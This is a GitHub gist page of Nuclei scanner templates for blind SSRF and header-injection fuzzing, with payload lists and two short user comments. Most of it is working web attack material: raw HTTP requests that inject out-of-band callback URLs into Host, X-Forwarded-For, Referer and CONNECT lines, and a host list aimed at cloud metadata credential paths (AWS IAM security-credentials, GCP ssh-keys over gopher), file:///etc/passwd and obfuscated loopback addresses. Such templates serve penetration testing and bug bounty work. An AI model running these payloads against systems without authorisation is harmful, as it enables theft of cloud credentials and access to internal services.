Skip to content

Instantly share code, notes, and snippets.

@ResistanceIsUseless

ResistanceIsUseless/Header-Injection.yaml

Last active December 30, 2024 07:50
Show Gist options
  • Save ResistanceIsUseless/e46848f67706a8aa1205c9d2866bff31 to your computer and use it in GitHub Desktop.
Save ResistanceIsUseless/e46848f67706a8aa1205c9d2866bff31 to your computer and use it in GitHub Desktop.
Download ZIP
Nuclei SSRF Fuzzing Template
Raw
blind-ssrf.yaml
id: header-blind-ssrf
info:
name: Header Blind SSRF Injection
author: geeknik,nullrabbit
severity: high
description: Checks for Blind SSR via popular browser headers.
tags: ssrf
requests:
- payloads:
header: helpers/payloads/proxy-headers.txt
raw:
- |
GET /?§header§ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
§header§: {{interactsh-url}}
Connection: close
redirects: true
max-redirects: 5
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- "http"
condition: or
Raw
Header-Injection.yaml
id: header-injection
info:
name: Header SSRF Injection
author: nullrabbit
severity: high
description: Fuzzing headers for OOB SSRF
tags: fuzz,ssrf
requests:
- payloads:
header: helpers/payloads/proxy-headers.txt
- raw:
- |
GET / HTTP/1.1
Host: {{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
GET / HTTP/1.1
Host: {{Hostname}}
Host: {{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
GET / HTTP/1.1
Host: {{Hostname}}@{{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
GET / HTTP/1.1
Host: {{Hostname}}@{{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
GET / HTTP/1.1
Host: {{BaseURL}}@{{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
GET @{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
GET {{BaseURL}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
GET / HTTP/1.1
Host: {{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-Host: {{interactsh-url}}
Connection: close
- |
GET /{{interactsh-url}}/{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
GET {{BaseURL}} HTTP/1.1
Host: {{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-Host: {{interactsh-url}}
Via: {{interactsh-url}}
Connection: close
- |
GET / HTTP/1.1
Host: {{BaseURL}}/?{{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-Host: {{interactsh-url}}
Via: {{interactsh-url}}
Connection: close
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-For: {{interactsh-url}}
Referer: {{BaseURL}}/?url={{interactsh-url}}
Connection: close
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-For: {{interactsh-url}}
Referer: {{BaseURL}}/?url={{interactsh-url}}
True-Client-IP: {{interactsh-url}}
X-WAP-Profile: http://{{interactsh-url}}/wap.xml
Connection: close
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-For: {{interactsh-url}}
Expect-Ct: max-age=6*6, report-uri="https://{{interactsh-url}}/expect-ct"
Connection: close
- |
GET /admin HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-For: {{interactsh-url}}
Connection: close
- |
POST /admin HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-To: {{interactsh-url}}
Connection: close
- |
GET /api/v1/;;/admin/ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-For: {{interactsh-url}}
Connection: close
- |
GET /api/;;/admin/ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-For: {{interactsh-url}}
Connection: close
- |
GET /api/v1/secrets HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-For: {{interactsh-url}}
Connection: close
- |
CONNECT {{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-Host: {{interactsh-url}}
X-Forwarded-For: {{interactsh-url}}
- |
POST / HTTP/1.1
Host: {{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-For: {{interactsh-url}}
Connection: close
- |
HEAD / HTTP/1.1
Host: {{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
X-Forwarded-To: {{interactsh-url}}
Connection: close
- |
HEAD / HTTP/1.1
Host: {{Hostname}}
Host: {{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
HEAD / HTTP/1.1
Host: {{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
HEAD / HTTP/1.1
Host: {{interactsh-url}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
GET /stats HTTP/1.1
Host: 127.0.0.1:9901
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
GET /services HTTP/1.1
Host: 127.0.0.1:8001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
GET /services HTTP/1.1
Host: 127.0.0.1:8444
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
redirects: true
matchers-condition: or
matchers:
- type: status
status:
- 200
- 302
- type: word
part: interactsh_protocol
words:
- "dns"
- "http"
Raw
proxy-headers.txt
Proxy-Host
Request-Uri
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Server
X-Forwarder-For
X-Forward-For
x-forwarded-proto
Base-Url
Http-Url
Proxy-Url
Redirect
Real-Ip
Referer
Referer
Referrer
Refferer
Uri
X-Host
X-Http-Destinationurl
X-Http-Host-Override
X-Original-Remote-Addr
X-Original-Url
X-Proxy-Url
X-Rewrite-Url
X-Real-Ip
X-Remote-Addr
x-requested-with
x-request-id
x-wap-profile
x-csrftoken
x-cluster-client-ip
x-client-ip
x-arbitrary
uid
true-client-ip
proxy-host
warning
user-agent
Location
via
Alt-Svc
Proxy
Profile
Origin
link
from
forwarded
destination
cookie
contact
cluster-client-ip
cluster
client-ip
cf-connecting-ip
alt-svc
accept-language
accept
HTTP_FORWARDED
HTTP_CLIENT_IP
HTTP_FORWARDED_FOR
HTTP_X_FORWARDED
HTTP_X_FORWARDED_FOR
if-modified-since
Raw
ssrf-hosts.txt
127.0.0.1
127.0.1.3
0
127.1
127.0.1
localhost
1.0.0.127.in-addr.arpa
01111111000000000000000000000001
0x7f.0x0.0x0.0x1
0177.0.0.01
7F000001
2130706433
6425673729
127001
127_0._0_1
0000::1
0000::1:80
::ffff:7f00:0001
0000:0000:0000:0000:0000:ffff:7f00:0001
spoofed.burpcollaborator.net
localtest.me
customer1.app.localhost.my.company.127.0.0.1.nip.io
bugbounty.dod.network
127.127.127.127
0177.0.0.1
⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80
⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80
②⑧⑤②⓪③⑨①⑥⑥:80
⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80
[email protected]
0x7f000001
017700000001
0177.00.00.01
0000.0000.0000.0000
0x7f.0x0.0x0.0x1
0177.0000.0000.0001
0177.0001.0000..0001
0x7f.0x1.0x0.0x1
0x7f.0x1.0x1
0x7f.0x00.0x00.0x01
0177.0.0.01
ht�️tp://12�7.0.0.1
localhost:+11211aaa
localhost:00011211aaaa
loopback:+11211aaa
loopback:00011211aaaa
⑯⑨。②⑤④。⑯⑨。②⑤④
169.254.169.254
2852039166
7147006462
0xa9.0xfe.0xa9.0xfe
0251.0376.0251.0376
169。254。169。254
169。254。169。254
⑯⑨。②⑤④。⑯⑨。②⑤④
⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80
⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80
②⑧⑤②⓪③⑨①⑥⑥:80
④②⑤。⑤①⓪。④②⑤。⑤①⓪:80
⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80
⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥:80
[::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80
[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80
⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80
⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80
⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80
⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧:80
dict://attacker:11111
file:///etc/passwd
file://\/\/etc/passwd
file://path/to/file
gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a
gopher://nozaki.io/_SSRF%0ATest!
0.0.0.0:22
0.0.0.0:443
0.0.0.0:80
0.0.0.0:443
0.0.0.0:3389
0000::1:22
0000::1:25
0000::1:3128
0000::1:80
0000::1:3389
0177.0.0.1
0251.00376.000251.0000376
0251.0376.0251.0376
0x41414141A9FEA9FE
0xA9.0xFE.0xA9.0xFE
0xA9FEA9FE
0xa9.0xfe.0xa9.0xfe
0xa9fea9fe
100.100.100.200/latest/meta-data/
100.100.100.200/latest/meta-data/image-id
100.100.100.200/latest/meta-data/instance-id
127.0.0.0
127.0.0.1:22
127.0.0.1:2379/version
127.0.0.1:443
127.0.0.1:80
127.0.0.1:3389
127.0.0.1:8000
127.0.0.1:9901
127.0.0.1:8001
127.0.0.1:8444
127.0.1.3
127.1.1.1
127.1.1.1:80#\@127.2.2.2:80
127.1.1.1:80:\@@127.2.2.2:80
127.1.1.1:80\@127.2.2.2:80
127.1.1.1:80\@@127.2.2.2:80
127.127.127.127
127.127.127.127.nip.io
169.254.169.254
169.254.169.254.xip.io
169.254.169.254/computeMetadata/v1/
169.254.169.254/latest/dynamic/instance-identity/document
169.254.169.254/latest/meta-data/
169.254.169.254/latest/meta-data/ami-id
169.254.169.254/latest/meta-data/hostname
169.254.169.254/latest/meta-data/iam/security-credentials/
169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
169.254.169.254/latest/meta-data/iam/security-credentials/dummy
169.254.169.254/latest/meta-data/iam/security-credentials/s3access
169.254.169.254/latest/meta-data/public-keys/
169.254.169.254/latest/meta-data/public-keys/0/openssh-key
169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
169.254.169.254/latest/meta-data/reservation-id
169.254.169.254/latest/user-data
169.254.169.254/latest/user-data/iam/security-credentials/
192.0.0.192/latest/
192.0.0.192/latest/attributes/
192.0.0.192/latest/meta-data/
192.0.0.192/latest/user-data/
1ynrnhl.xip.io
2130706433
2852039166
3232235521
3232235777
425.510.425.510
7147006462
[0:0:0:0:0:ffff:127.0.0.1]
[0:0:0:0:0:ffff:127.0.0.1]:8000
[0:0:0:0:0:ffff:127.0.0.1]:8001
[0:0:0:0:0:ffff:127.0.0.1]:8444
[0:0:0:0:0:ffff:127.0.0.1]:9901
[::]
[::]:22
[::]:25
[::]:3128
[::]:80
[::]:3389
[::]:8000
[::]:8001
[::]:8444
[::]:9901
app-169-254-169-254.nip.io
bugbounty.dod.network
customer1.app.localhost.my.company.127.0.0.1.nip.io
customer2-app-169-254-169-254.nip.io
instance-data
localhost:+11211aaa
localhost:00011211aaaa
localhost:22
localhost:443
localhost:80
localhost:3389
localhost:8000
localhost:8001
localhost:8444
localhost:9901
localhost.localdomain
loopback
loopback:22
loopback:80
loopback:443
loopback:3389
loopback:8000
loopback:9901
loopback:8001
loopback:8444
localtest.me
ipcop.localdomain:8443
mail.ebc.apple.com
metadata.google.internal/computeMetadata/v1/
metadata.google.internal/computeMetadata/v1/instance/hostname
metadata.google.internal/computeMetadata/v1/instance/id
metadata.google.internal/computeMetadata/v1/project/project-id
metadata.nicob.net
owasp.org.169.254.169.254.nip.io
spoofed.burpcollaborator.net
ssrf-169.254.169.254.localdomain.pw
ssrf-cloud.localdomain.pw
www.owasp.org.1ynrnhl.xip.io
Raw
ssrf_fuzz.yaml
id: ssrf-header-injection
info:
name: Header Command Injection
author: nullrabbit
severity: high
description: Fuzzing headers for command injection
tags: fuzz,ssrf
requests:
- payloads:
payload: helpers/payloads/ssrf-hosts.txt
header: helpers/payloads/proxy-headers.txt
raw:
- |
GET / HTTP/1.1
Host: §payload§
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
§header§ §payload§
Connection: close
attack: clusterbomb
threads: 10
matchers:
- type: status
status:
- 200
@mb01LINX
Copy link

mb01LINX commented Dec 21, 2024
edited
Loading

how to use? i mean in nuclei command i try but notting works how, no bugs in my time??..

@ResistanceIsUseless
Copy link
Author

Did you make sure to have the payload files in helpers/payloads/ or whatever path works for you? I haven't confirmed it's working on the most recent versions of nuclei, but it should be working.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment